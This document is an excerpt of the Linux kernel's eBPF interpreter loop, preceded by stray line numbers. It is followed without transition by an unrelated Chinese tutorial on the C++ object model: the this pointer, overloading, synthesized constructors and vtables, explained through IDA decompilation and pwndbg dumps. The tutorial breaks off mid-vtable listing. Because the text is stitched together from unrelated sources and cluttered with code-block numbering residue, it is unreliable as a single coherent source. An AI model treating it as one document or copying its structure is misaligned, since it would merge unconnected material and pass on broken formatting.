183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
/*
 * Core of the eBPF interpreter. Starting at @insn, each instruction is
 * dispatched through a computed-goto jump table indexed by insn->code and
 * executed until JMP_EXIT returns the value of BPF_R0. An opcode with no
 * handler lands on default_label, which warns and hits BUG_ON().
 */
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn, u64 *stack)
{
#define BPF_INSN_2_LBL(x, y) [BPF_##x | BPF_##y] = &&x##_##y
#define BPF_INSN_3_LBL(x, y, z) [BPF_##x | BPF_##y | BPF_##z] = &&x##_##y##_##z
static const void * const jumptable[256] __annotate_jump_table = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */
BPF_INSN_MAP(BPF_INSN_2_LBL, BPF_INSN_3_LBL),
/* Non-UAPI available opcodes. */
[BPF_JMP | BPF_CALL_ARGS] = &&JMP_CALL_ARGS,
[BPF_JMP | BPF_TAIL_CALL] = &&JMP_TAIL_CALL,
[BPF_LDX | BPF_PROBE_MEM | BPF_B] = &&LDX_PROBE_MEM_B,
[BPF_LDX | BPF_PROBE_MEM | BPF_H] = &&LDX_PROBE_MEM_H,
[BPF_LDX | BPF_PROBE_MEM | BPF_W] = &&LDX_PROBE_MEM_W,
[BPF_LDX | BPF_PROBE_MEM | BPF_DW] = &&LDX_PROBE_MEM_DW,
}; /* jump table: maps each opcode to the label of its handler */
#undef BPF_INSN_3_LBL
#undef BPF_INSN_2_LBL
u32 tail_call_cnt = 0;

/* Both macros advance to the next instruction and re-dispatch */
#define CONT ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

select_insn:
goto *jumptable[insn->code];

/* ALU */
#define ALU(OPCODE, OP) \
ALU64_##OPCODE##_X: \
DST = DST OP SRC; \
CONT; \
ALU_##OPCODE##_X: \
DST = (u32) DST OP (u32) SRC; \
CONT; \
ALU64_##OPCODE##_K: \
DST = DST OP IMM; \
CONT; \
ALU_##OPCODE##_K: \
DST = (u32) DST OP (u32) IMM; \
CONT;

ALU(ADD, +)
ALU(SUB, -)
ALU(AND, &)
ALU(OR, |)
ALU(LSH, <<)
ALU(RSH, >>)
ALU(XOR, ^)
ALU(MUL, *)
#undef ALU
ALU_NEG:
DST = (u32) -DST;
CONT;
ALU64_NEG:
DST = -DST;
CONT;
ALU_MOV_X:
DST = (u32) SRC;
CONT;
ALU_MOV_K:
DST = (u32) IMM;
CONT;
ALU64_MOV_X:
DST = SRC;
CONT;
ALU64_MOV_K:
DST = IMM;
CONT;
LD_IMM_DW:
/* 64-bit immediate is split across two instruction slots; skip the second */
DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
insn++;
CONT;
ALU_ARSH_X:
DST = (u64) (u32) (((s32) DST) >> SRC);
CONT;
ALU_ARSH_K:
DST = (u64) (u32) (((s32) DST) >> IMM);
CONT;
ALU64_ARSH_X:
(*(s64 *) &DST) >>= SRC;
CONT;
ALU64_ARSH_K:
(*(s64 *) &DST) >>= IMM;
CONT;
ALU64_MOD_X:
div64_u64_rem(DST, SRC, &AX);
DST = AX;
CONT;
ALU_MOD_X:
AX = (u32) DST;
DST = do_div(AX, (u32) SRC);
CONT;
ALU64_MOD_K:
div64_u64_rem(DST, IMM, &AX);
DST = AX;
CONT;
ALU_MOD_K:
AX = (u32) DST;
DST = do_div(AX, (u32) IMM);
CONT;
ALU64_DIV_X:
DST = div64_u64(DST, SRC);
CONT;
ALU_DIV_X:
AX = (u32) DST;
do_div(AX, (u32) SRC);
DST = (u32) AX;
CONT;
ALU64_DIV_K:
DST = div64_u64(DST, IMM);
CONT;
ALU_DIV_K:
AX = (u32) DST;
do_div(AX, (u32) IMM);
DST = (u32) AX;
CONT;
ALU_END_TO_BE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_be16(DST);
break;
case 32:
DST = (__force u32) cpu_to_be32(DST);
break;
case 64:
DST = (__force u64) cpu_to_be64(DST);
break;
}
CONT;
ALU_END_TO_LE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_le16(DST);
break;
case 32:
DST = (__force u32) cpu_to_le32(DST);
break;
case 64:
DST = (__force u64) cpu_to_le64(DST);
break;
}
CONT;

/* CALL */
JMP_CALL:
/* Function call scratches BPF_R1-BPF_R5 registers,
* preserves BPF_R6-BPF_R9, and stores return value
* into BPF_R0.
*/
BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
BPF_R4, BPF_R5);
CONT;

JMP_CALL_ARGS:
BPF_R0 = (__bpf_call_base_args + insn->imm)(BPF_R1, BPF_R2,
BPF_R3, BPF_R4,
BPF_R5,
insn + insn->off + 1);
CONT;

JMP_TAIL_CALL: {
struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
struct bpf_array *array = container_of(map, struct bpf_array, map);
struct bpf_prog *prog;
u32 index = BPF_R3;

if (unlikely(index >= array->map.max_entries))
goto out;
if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
goto out;

tail_call_cnt++;

prog = READ_ONCE(array->ptrs[index]);
if (!prog)
goto out;

/* ARG1 at this point is guaranteed to point to CTX from
* the verifier side due to the fact that the tail call is
* handled like a helper, that is, bpf_tail_call_proto,
* where arg1_type is ARG_PTR_TO_CTX.
*/
insn = prog->insnsi;
goto select_insn;
out:
CONT;
}
JMP_JA:
insn += insn->off;
CONT;
JMP_EXIT:
return BPF_R0;
/* JMP */
#define COND_JMP(SIGN, OPCODE, CMP_OP) \
JMP_##OPCODE##_X: \
if ((SIGN##64) DST CMP_OP (SIGN##64) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_X: \
if ((SIGN##32) DST CMP_OP (SIGN##32) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP_##OPCODE##_K: \
if ((SIGN##64) DST CMP_OP (SIGN##64) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_K: \
if ((SIGN##32) DST CMP_OP (SIGN##32) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT;
COND_JMP(u, JEQ, ==)
COND_JMP(u, JNE, !=)
COND_JMP(u, JGT, >)
COND_JMP(u, JLT, <)
COND_JMP(u, JGE, >=)
COND_JMP(u, JLE, <=)
COND_JMP(u, JSET, &)
COND_JMP(s, JSGT, >)
COND_JMP(s, JSLT, <)
COND_JMP(s, JSGE, >=)
COND_JMP(s, JSLE, <=)
#undef COND_JMP
/* STX and ST and LDX*/
#define LDST(SIZEOP, SIZE) \
STX_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = SRC; \
CONT; \
ST_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = IMM; \
CONT; \
LDX_MEM_##SIZEOP: \
DST = *(SIZE *)(unsigned long) (SRC + insn->off); \
CONT;

LDST(B, u8)
LDST(H, u16)
LDST(W, u32)
LDST(DW, u64)
#undef LDST
#define LDX_PROBE(SIZEOP, SIZE) \
LDX_PROBE_MEM_##SIZEOP: \
bpf_probe_read_kernel(&DST, SIZE, (const void *)(long) (SRC + insn->off)); \
CONT;
LDX_PROBE(B, 1)
LDX_PROBE(H, 2)
LDX_PROBE(W, 4)
LDX_PROBE(DW, 8)
#undef LDX_PROBE

STX_XADD_W: /* lock xadd *(u32 *)(dst_reg + off16) += src_reg */
atomic_add((u32) SRC, (atomic_t *)(unsigned long)
(DST + insn->off));
CONT;
STX_XADD_DW: /* lock xadd *(u64 *)(dst_reg + off16) += src_reg */
atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
(DST + insn->off));
CONT;

default_label:
/* If we ever reach this, we have a bug somewhere. Die hard here
* instead of just returning 0; we could be somewhere in a subprog,
* so execution could continue otherwise which we do /not/ want.
*
* Note, verifier whitelists all opcodes in bpf_opcode_in_insntable().
*/
pr_warn("BPF interpreter: unknown opcode %02x\n", insn->code);
BUG_ON(1);
return 0;
}

cpp 对象

C++ 的每一个成员函数在 class 中声明,但是却不出现在每个对象中:

  • 每一个非内联的成员函数,只会诞生一个函数实例
  • 每个内联函数,会在其每一个使用者身上产生一个函数实例

C++ 的类就相当于一个数据结构体加上多个函数:

1
Class = data structure + code (methods)

This 指针

This 指针就是指向实例对象自己的指针

案例一:This 的使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include<iostream>
#include<string.h>
using namespace std;

// Base owns the shared name buffer and the printer used by both subclasses.
class Base{
public:
void fun(){
cout<<name<<endl;
}
char name[8];
};

// A stores "A" in the inherited buffer through `this`, then prints it.
class A : public Base{
public:
void foo(){
strcpy(this->name,"A");
this->fun(); // equivalent to calling fun() directly
}
};

// B does the same with "B".
class B : public Base{
public:
void foo(){
strcpy(this->name,"B");
this->fun();
}
};

// Creates one A and one B on the heap and calls foo() on each.
// The objects are never deleted; the demo simply falls off the end of main.
int main(void){
A *a = new A();
B *b = new B();
a->foo();
b->foo();
}
  • 在调用类函数时,会将其 new 出来的堆内存当做第一个参数传入(相当于传入了该对象的数据结构体)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rax
B *v4; // rax
A *a; // [rsp+0h] [rbp-10h]
B *b; // [rsp+8h] [rbp-8h]

v3 = (A *)operator new(8uLL);
*v3 = 0LL;
a = v3;
v4 = (B *)operator new(8uLL);
*v4 = 0LL;
b = v4;
A::foo(a);
B::foo(b);
return 0;
}
  • 使用 This 指针,可以快速操控本实例对象的各个成员:
1
2
3
4
5
void __cdecl A::foo(A *const this)
{
*(_WORD *)this->name = 65; // 编译器优化了
Base::fun(this);
}

重载

C++ 允许在同一作用域中的某个函数和运算符指定多个定义,分别称为:

  • 函数重载
  • 运算符重载

函数重载:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <iostream>
using namespace std;

// Two overloads of print() that differ only in parameter type.
class Test{
public:
void print(int i) {
cout<<"int:"<<i<<endl;
}
void print(double f) {
cout<<"double:"<<f<<endl;
}
};

// The literal's type selects the overload: 1 -> print(int), 1.1 -> print(double).
int main(void)
{
Test *t = new Test;
t->print(1);
t->print(1.1);
}
  • 对于类函数来说,编译器会按照固定的名称修饰(name mangling)规则,把 [类名称,函数名称,参数列表] 编码进符号名(例如 Test::print(int) 被编码为 _ZN4Test5printEi),并用这个修饰后的名字来当做函数的名称(这是一种确定的、可逆的编码,并不是哈希):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near

f= qword ptr -18h
t= qword ptr -8

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 20h
mov edi, 1 ; unsigned __int64
call __Znwm ; operator new(ulong)
mov [rbp+t], rax
mov rax, [rbp+t]
mov esi, 1 ; i
mov rdi, rax ; this
call _ZN4Test5printEi ; Test::print(int)
mov rdx, cs:qword_2018
mov rax, [rbp+t]
mov [rbp+f], rdx
movsd xmm0, [rbp+f] ; f
mov rdi, rax ; this
call _ZN4Test5printEd ; Test::print(double)
mov eax, 0
leave
retn
; } // starts at 11BA
main endp
  • 在汇编代码中,程序调用的函数已经确定
  • 也就是说,重载决议发生在编译期:编译器在语义分析阶段就根据实参的类型从参数列表中确定了应该调用的函数

运算符重载(内部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <iostream>
using namespace std;

// A box described by its three edge lengths.
class Box
{
public:
    // Returns length * breadth * height. Const-qualified so that it can be
    // called on a const Box or through a const reference.
    double getVolume(void) const {
        return length * breadth * height;
    }
    // Sets all three edge lengths at once.
    void setAll(double len, double bre, double hei) {
        length = len;
        breadth = bre;
        height = hei;
    }
    // Member overload of '+': only selected when both operands are Box.
    // Returns a new Box whose edges are the element-wise sums; neither
    // operand is modified, hence the const qualifier.
    Box operator + (const Box& b) const {
        Box box;
        box.length = this->length + b.length;
        box.breadth = this->breadth + b.breadth;
        box.height = this->height + b.height;
        return box;
    }
    double length;
    double breadth;
    double height;
};

// Builds two boxes, adds them with the member operator+ and reads the volumes.
int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume(); // overwritten by the next assignment
volume = Box2.getVolume();
Box3 = Box1 + Box2; // resolves to Box::operator+(const Box&)
volume = Box3.getVolume();

return 0;
}
  • 在一个类中重载运算符过后,其作用范围为整个文件,以及引入该类的其他文件
  • 本质上重载运算符就是调用对应的函数(其参数和返回值必须符合条件)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
Box::operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl Box::operator+(Box *retstr, Box *const this, const Box *b)
{
retstr->length = b->length + this->length;
retstr->breadth = b->breadth + this->breadth;
retstr->height = b->height + this->height;
return retstr;
}
  • PS:Cpp 库中也有许多运算符重载的案例:new、<<、>>

运算符重载(外部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
using namespace std;

// A box described by its three edge lengths (variant used with the
// non-member operator+).
class Box
{
public:
    // Returns length * breadth * height. Const-qualified so that it can be
    // called through the const Box& operands a free operator+ receives.
    double getVolume(void) const {
        return length * breadth * height;
    }
    // Sets all three edge lengths at once.
    void setAll(double len, double bre, double hei) {
        length = len;
        breadth = bre;
        height = hei;
    }
    double length;
    double breadth;
    double height;
};

// Non-member overload of '+': returns a new Box whose edges are the
// element-wise sums of a and b. Neither operand is modified.
Box operator + (const Box& a,const Box& b){
Box box;
box.length = a.length + b.length;
box.breadth = a.breadth + b.breadth;
box.height = a.height + b.height;
return box;
}

// Same driver as the member-operator demo; here '+' resolves to the free
// function operator+(const Box&, const Box&).
int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume(); // overwritten by the next assignment
volume = Box2.getVolume();
Box3 = Box1 + Box2;
volume = Box3.getVolume();

return 0;
}
  • 在全局重载运算符过后,其作用范围就是全局(但可以被命名空间限制)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl operator+(Box *retstr, const Box *a, const Box *b)
{
retstr->length = b->length + a->length;
retstr->breadth = b->breadth + a->breadth;
retstr->height = b->height + a->height;
return retstr;
}

内联函数

在类的声明内部声明和定义的函数叫做内联成员函数

  • 内联函数类似于宏函数,但内联函数是在编译时展开,而宏在预编译时展开
  • 内联函数的定义和使用必须在同一文件,因此最好将内联函数定义放在头文件中

定义在类中的成员函数默认都是内联的,类外定义则要加上 inline(这里所说的内联成员函数,是指那些把定义直接写在类定义内部的成员函数)

1
2
3
4
5
6
7
// Shows the three ways a member function can relate to `inline`.
class Test{
public:
void setA(int _a); // ordinary member function (declaration only)
void setB(int _b){b = _b;} // implicitly inline: defined inside the class body
inline void setC(int _c); // explicitly declared inline
int a,b,c;
};
  • 在 IDA 中分析或者在 GDB 中调试,都发现函数没有内联成功(还是当成普通函数来调用):inline 只是给编译器的建议,在未开启优化(如 -O0)时编译器通常不会真正进行内联展开

构造函数

以下几种情况下,会合成有用的构造函数:

  • 带有默认构造函数的成员对象(例如:string 类)
  • 一个派生类的父类带有构造函数(或者父类的成员对象带有默认构造函数),那么子类:
    • 如果没有定义构造函数,则会合成默认构造函数
    • 如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数
  • 带有一个虚函数的类
    • 类声明(或继承)一个虚函数
    • 类派生自一个继承串链,其中有一个或更多的虚基类

案例一:带有默认构造函数的成员对象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <iostream>  
#include <string>

using namespace std;

// Test declares no constructor, but its string member has a default
// constructor that must run when a Test is created.
class Test
{
public:
string name;
};

// Default-constructs a Test on the stack.
int main(int argc, char* argv[])
{
Test t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test t; // [rsp+10h] [rbp-40h] BYREF
unsigned __int64 v5; // [rsp+38h] [rbp-18h]

v5 = __readfsqword(0x28u);
Test::Test(&t);
Test::~Test(&t);
return 0;
}
  • 由于 Test 类中的 string 类带有默认构造函数,因此 Test 类会合成一个构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
std::string::basic_string(this);
}

案例二:没有定义构造函数,则会合成默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>  
#include <string>

using namespace std;

// Base class with a user-declared default constructor.
class Test1{
public:
Test1();
};

// Derived class that declares no constructor of its own.
class Test2 : public Test1{

};

// Prints "Test1" so the base-constructor call is observable.
Test1::Test1(void){
cout << "Test1" << endl;
}

// Default-constructs a Test2 on the stack.
int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于 Test2 没有构造函数,但父类 Test1 有构造函数,因此在 Test2 的构造函数中会调用 Test1 的构造函数:
1
2
3
4
void __cdecl Test2::Test2(Test2 *const this)
{
Test1::Test1(this);
}

案例三:如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>  
#include <string>

using namespace std;

// Base class with a user-declared default constructor.
class Test1{
public:
Test1();
};

// Derived class with its own constructor that does not mention Test1.
class Test2 : public Test1{
public:
Test2();
};

// Prints "Test1" so the base-constructor call is observable.
Test1::Test1(void){
cout << "Test1" << endl;
}

// Prints "Test2"; contains no explicit call to the Test1 constructor.
Test2::Test2(void){
cout << "Test2" << endl;
}

// Default-constructs a Test2 on the stack.
int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于在 Test2 的构造函数中没有调用父类 Test1 的构造函数,因此编译器会自动在 Test2 的构造函数开头加上对 Test1 构造函数的调用:
1
2
3
4
5
6
7
8
void __cdecl Test2::Test2(Test2 *const this)
{
__int64 v1; // rax

Test1::Test1(this);
v1 = std::operator<<<std::char_traits<char>>(&std::cout, "Test2");
std::ostream::operator<<(v1, &std::endl<char,std::char_traits<char>>);
}

案例四:带有一个虚函数的类

  • 源代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include<iostream>
using namespace std;

// Class with a single virtual function and no user-declared constructor.
class Test{
public:
virtual void foo(){
cout<<"Test::foo() is called"<<endl;
}
};

// Heap-allocates a Test and calls foo() through the pointer.
// The object is never deleted.
int main(void){
Test *t = new Test();
t->foo();
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test *v3; // rbx

v3 = (Test *)operator new(8uLL);
v3->_vptr_Test = 0LL;
Test::Test(v3);
(*v3->_vptr_Test)(v3, argv);
return 0;
}
  • 由于 Test 中有虚函数,因此编译器会自动为其生成构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
this->_vptr_Test = (int (**)(...))&off_3D70;
}

虚函数

面向对象的语言有三大特性:继承、封装、多态,虚函数就是 cpp 实现多态的方式

  • 多态:指用相同的接口去表示不同的实现

案例一:使用虚函数实现多态

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include<iostream>
using namespace std;

// Polymorphic base: foo() is virtual, so calls through a Base* are
// dispatched on the dynamic type of the object.
class Base{
public:
virtual void foo(){
cout<<"Base::foo() is called"<<endl;
}
};

// Overrides Base::foo().
class A:public Base{
public:
void foo(){
cout<<"A::foo() is called"<<endl;
}
};

// Overrides Base::foo().
class B:public Base{
public:
void foo(){
cout<<"B::foo() is called"<<endl;
}
};

// Overrides Base::foo(); not instantiated by this demo's main().
class C:public Base{
public:
void foo(){
cout<<"C::foo() is called"<<endl;
}
};

// The object is a B, so both calls print "B::foo() is called".
// NOTE(review): casting a pointer to a B object to A* and calling through it
// is formally undefined behaviour; it is done here only to show that the
// call goes through the object's vtable rather than the pointer's static type.
int main(void){
Base *a = new B();
a->foo(); // B::foo() is called
((A *)a)->foo(); // B::foo() is called
return 0;
}
  • 当使用类的指针调用成员函数时:
    • 普通函数由指针类型决定
    • 虚函数由指针指向的实际类型决定
1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
B *v3; // rbx

v3 = (B *)operator new(8uLL);
v3->_vptr_Base = 0LL;
B::B(v3);
(*v3->_vptr_Base)(v3, argv);
(*v3->_vptr_Base)(v3);
return 0;
}
  • 这个 _vptr_Base 就是虚表指针(vptr),它指向该类的虚函数表,并且会在对应的构造函数中进行初始化
1
2
3
4
5
void __cdecl B::B(B *const this)
{
Base::Base(this);
this->_vptr_Base = (int (**)(...))&off_3D40;
}
1
2
.data.rel.ro:0000000000003D40 8C 12 00 00 00 00 00 00       off_3D40 dq offset _ZN1B3fooEv          ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003D40 ; B::foo(void)

对于拥有虚函数的类,其每个对象均具有一个指向本类虚函数表的指针 _vptr_Base(可以将其理解为指向“虚函数指针数组”的指针)

案例二:虚函数的调用与虚表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
virtual void foo4(){
cout<<"Base::foo4() is called"<<endl;
}
virtual void foo5(){
cout<<"Base::foo5() is called"<<endl;
}
};

int main(void){
Base *a = new Base();
a->foo1();
a->foo2();
a->foo3();
a->foo4();
a->foo5();
}
  • cpp 底层处理虚表的方式就是强转并调用 _vptr_Base + offset
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __cdecl main(int argc, const char **argv, const char **envp)
{
Base *v3; // rbx
Base *a; // [rsp+8h] [rbp-18h]

v3 = (Base *)operator new(8uLL);
v3->_vptr_Base = 0LL;
Base::Base(v3);
a = v3;
(*v3->_vptr_Base)(v3, argv);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 2))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 4))(a);
return 0;
}
  • 再看一个去符号的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
__int64 __fastcall main(int a1, char **a2, char **a3)
{
_QWORD *v3; // rbx
_QWORD *v5; // [rsp+8h] [rbp-18h]

v3 = (_QWORD *)operator new(8uLL);
*v3 = 0LL;
sub_13B4(v3, a2);
v5 = v3;
(*(void (__fastcall **)(_QWORD *))*v3)(v3);
(*(void (__fastcall **)(_QWORD *))(*v5 + 8LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 16LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 24LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 32LL))(v5);
return 0LL;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
5
6
.data.rel.ro:0000000000003D50 9C 12 00 00 00 00 00 00       off_3D50 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D50 ; Base::foo1(void)
.data.rel.ro:0000000000003D58 D4 12 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D60 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D68 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo4Ev ; Base::foo4(void)
.data.rel.ro:0000000000003D70 7C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo5Ev ; Base::foo5(void)
  • 用 GDB 进行调试:
1
2
3
4
5
6
pwndbg> telescope 0x55883ca88000+0x3D50
00:0000│ rdx 0x55883ca8bd50 —▸ 0x55883ca8929c (Base::foo1()) ◂— push rbp
01:0008│     0x55883ca8bd58 —▸ 0x55883ca892d4 (Base::foo2()) ◂— push rbp
02:0010│     0x55883ca8bd60 —▸ 0x55883ca8930c (Base::foo3()) ◂— push rbp
03:0018│     0x55883ca8bd68 —▸ 0x55883ca89344 (Base::foo4()) ◂— push rbp
04:0020│     0x55883ca8bd70 —▸ 0x55883ca8937c (Base::foo5()) ◂— push rbp

案例三:虚函数的继承

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
};

/*
 * Derived class for the vtable-inheritance demo: inherits foo1..foo3 from
 * Base unchanged and appends two new virtual functions of its own.
 * Each function prints its own qualified name so the call that was
 * dispatched can be identified from the program output.
 */
class A : public Base{
public:
    virtual void fooa(){
        cout<<"A::fooa() is called"<<endl;
    }
    virtual void foob(){
        cout<<"A::foob() is called"<<endl;
    }
};

/*
 * Second derived class for the vtable-inheritance demo: same shape as A
 * (inherits foo1..foo3 from Base, adds fooa/foob), but with its own
 * implementations so that A and B get distinct vtable entries.
 * Each function prints its own qualified name.
 */
class B : public Base{
public:
    virtual void fooa(){
        cout<<"B::fooa() is called"<<endl;
    }
    virtual void foob(){
        cout<<"B::foob() is called"<<endl;
    }
};

int main(void){
A *a = new A();
B *b = new B();
a->foo1();
a->foo2();
b->fooa();
b->foob();
a->fooa();
a->foob();
}
  • 当一个类继承带有虚函数的类时,它会先将父类的虚表复制一份,然后将自己的虚表添加到后面:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rbx
B *v4; // rbx
A *a; // [rsp+0h] [rbp-20h]
B *b; // [rsp+8h] [rbp-18h]

v3 = (A *)operator new(8uLL);
v3->_vptr_Base = 0LL;
A::A(v3);
a = v3;
v4 = (B *)operator new(8uLL);
v4->_vptr_Base = 0LL;
B::B(v4);
b = v4;
(*a->_vptr_Base)(a, argv);
(*((void (__fastcall **)(A *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(B *))b->_vptr_Base + 3))(b);
(*((void (__fastcall **)(B *))b->_vptr_Base + 4))(b);
(*((void (__fastcall **)(A *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(A *))a->_vptr_Base + 4))(a);
return 0;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
.data.rel.ro:0000000000003D30 D4 12 00 00 00 00 00 00       off_3D30 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D30 ; Base::foo1(void)
.data.rel.ro:0000000000003D38 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D40 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CF8 D4 12 00 00 00 00 00 00       off_3CF8 dq offset _ZN4Base4foo1Ev      ; DATA XREF: A::A(void)+18↑o
.data.rel.ro:0000000000003CF8 ; Base::foo1(void)
.data.rel.ro:0000000000003D00 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D08 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D10 7C 13 00 00 00 00 00 00 dq offset _ZN1A4fooaEv ; A::fooa(void)
